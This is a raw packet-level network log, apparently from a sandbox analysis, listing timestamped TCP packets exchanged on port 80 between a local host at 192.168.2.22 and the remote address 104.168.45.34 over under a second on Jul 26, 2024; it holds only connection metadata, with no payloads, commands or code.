Jul 26, 2024 13:02:48.880729914 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880742073 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880744934 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.880793095 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.880793095 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.882242918 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882261038 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882276058 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882291079 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882306099 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882319927 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.882319927 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882319927 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.882334948 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882349014 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882364035 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882378101 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882378101 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.882378101 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.882395983 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.882680893 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.886993885 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887008905 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887023926 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887037992 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.887078047 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.887105942 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887120962 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887136936 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887236118 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887250900 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887264967 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.887419939 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887434959 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887447119 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.887449026 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887463093 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887478113 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.887478113 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.887479067 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887562037 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.887748003 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887762070 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.887797117 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.888168097 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888252974 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888268948 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888292074 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.888519049 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888531923 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888546944 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888601065 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.888638020 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888653040 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888667107 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888681889 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888690948 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.888696909 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888710976 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.888711929 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.888737917 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.889429092 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.889453888 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.889468908 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.889472961 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.889586926 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.889950037 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.889965057 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.889978886 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.889993906 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.890007973 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.890120983 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.960551977 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960622072 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960658073 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960669994 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.960690022 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960726023 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960773945 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960783005 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.960805893 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960838079 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960853100 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.960869074 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960901022 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.960906029 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.960937977 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961025000 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961059093 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961070061 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.961144924 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961177111 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961215019 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.961275101 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.961297035 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961328983 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961360931 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961393118 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961401939 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.961430073 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961462975 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.961561918 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961594105 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961612940 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.961626053 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961658955 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.961664915 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.962002993 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.962048054 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.962053061 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.962085962 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.962146997 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.963556051 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963606119 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963638067 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963649035 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.963669062 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963725090 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963735104 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.963756084 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963788986 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963819981 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963826895 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.963865042 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.963870049 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963901997 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963933945 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963949919 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.963964939 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.963995934 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964003086 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.964026928 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964061022 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964092970 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964112043 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.964123964 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964155912 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964169979 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.964188099 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964225054 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.964556932 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964589119 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964618921 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964649916 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964660883 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.964682102 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964714050 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964735985 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.964746952 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964782000 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.964783907 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.964853048 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.966008902 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966042042 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966094017 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.966365099 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966414928 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966448069 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966456890 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.966582060 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966614008 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966625929 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.966646910 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966679096 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966711998 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.966806889 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966839075 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966850996 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.966872931 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966905117 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966921091 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.966938972 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.966981888 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.966986895 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967019081 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967083931 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.967135906 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967166901 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967200994 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967232943 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967233896 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.967267036 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967272043 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.967298031 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967329979 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967344999 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.967364073 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967406034 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.967920065 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.967995882 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.968149900 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.969230890 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969290972 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969305992 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969378948 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.969456911 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969471931 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969485998 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969501019 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969516039 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.969547987 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.969609022 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969624043 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969639063 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969655037 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969671011 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.969701052 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.969791889 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969820023 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969835043 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969851971 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.969934940 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.969975948 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.970010996 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970026016 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970041037 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970060110 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970079899 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.970099926 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.970176935 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970191002 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970215082 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970237017 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.970590115 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970658064 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970674038 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:48.970705032 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.970705032 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:48.970721006 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047005892 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047094107 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047095060 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.047130108 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047199965 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.047241926 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047274113 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047307968 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047317028 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.047339916 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047373056 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047589064 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.047653913 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047687054 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047718048 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047751904 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047756910 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.047756910 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.047785997 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047817945 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047849894 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047892094 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.047931910 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.047931910 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.048347950 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048379898 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048412085 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048434973 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.048444986 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048511028 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.048762083 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048794031 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048825979 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048839092 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.048856974 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048890114 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048921108 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048953056 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.048962116 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.048984051 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049015999 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049026966 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.049026966 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.049046040 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049078941 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049109936 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049143076 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049191952 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.049191952 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.049840927 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049873114 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049905062 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049916029 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.049937010 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049968958 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.049983025 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.049999952 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050031900 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050056934 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.050064087 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050095081 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050122976 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.050131083 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050163984 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050178051 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.050195932 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050226927 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050234079 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.050261021 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050414085 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.050962925 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.050995111 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051027060 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051038980 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051059008 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051090002 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051139116 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051147938 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051187038 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051218987 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051224947 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051250935 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051284075 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051325083 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051325083 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051333904 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051364899 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051414967 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051445961 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051476955 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051492929 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051507950 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051538944 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051569939 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051580906 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051580906 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051600933 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051634073 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051645041 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051666021 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051697016 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051729918 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051759958 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051769972 CEST	49181	80	192.168.2.22	104.168.45.34
